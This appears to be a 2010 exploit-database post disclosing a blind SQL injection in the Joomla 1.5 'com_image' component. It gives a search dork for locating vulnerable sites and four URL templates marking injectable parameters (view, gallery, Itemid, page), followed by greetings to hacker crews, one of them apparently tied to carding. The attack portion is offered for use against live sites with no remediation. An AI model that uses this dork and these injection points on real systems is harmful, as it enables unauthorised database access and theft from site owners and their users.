Home / os / win7

Joomla Components com_image SQL Injection Vulnerability

Posted on 14 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Components com_image SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================================
Joomla Components com_image SQL Injection Vulnerability
=======================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0     _                   __           __       __                     0
1   /'             __  /'__`        / \__  /'__`                   1
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           0
1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          1
0       / /    /   / \__/  \_  \_   /           0
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           1
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           0
1                   \____/ &gt;&gt; Exploit database separated by exploit   1
0                   /___/                                             0
0                                                                      1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0

[+] Title	: joomla image_com Blind Sql Injection
[+] Author	: mc2_s3lector
[+] site	: www.yogyacarderlink.web.id
[+] Aplication	: Joomla 1.5 some version/PHP 
[+] Dork        : inurl:&quot;com_image&quot;

code:

dnsname/patch/index.php?option=com_image&amp;view=[sqli]
dnsname/patch/index.php?option=com_image&amp;Itemid=87&amp;gallery=[sqli]
dnsname/patch/index.php?option=com_image&amp;view=image&amp;Itemid=[sqli]
dnsname/patch/index.php?option=com_image&amp;page=[sqli]
------------------------------------------------------------------------------------------------------------------
thank to family yogyacarderlink		 : v3nom,z0mb1e,m4rc0,mywisd0m,setanmuda,leqhi,lingga,JaLi,g3l4p_gul1t@,
					   d3wancc,craxboy90,bye-bye,bejo6,joglo,yuy03zt &amp; all GAY :P

thank to makassar security research      : c0decstuff,flowerjingga,kernelpreter,dewiyunand4:P,x0|2

thank to family KeDaiComputerworks	 : Wahdan(elpac1ano)on3-d4y,KeDai v5,muhammad abudhar,h3ndry_sl4nk,and3rson
					   opeey,ravenvill,4m-007
thank to family Makassar open code/google:  
hide frofile you all     
					 : yuy03zt,qtung'ID,jack throya,william,pertiwil,ridobattala,kernel maniac
                                           h3xa maniac,Poisoning(you are expert &amp; low profile) 
--------------------------------------------------------------------------------------------------------------------



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :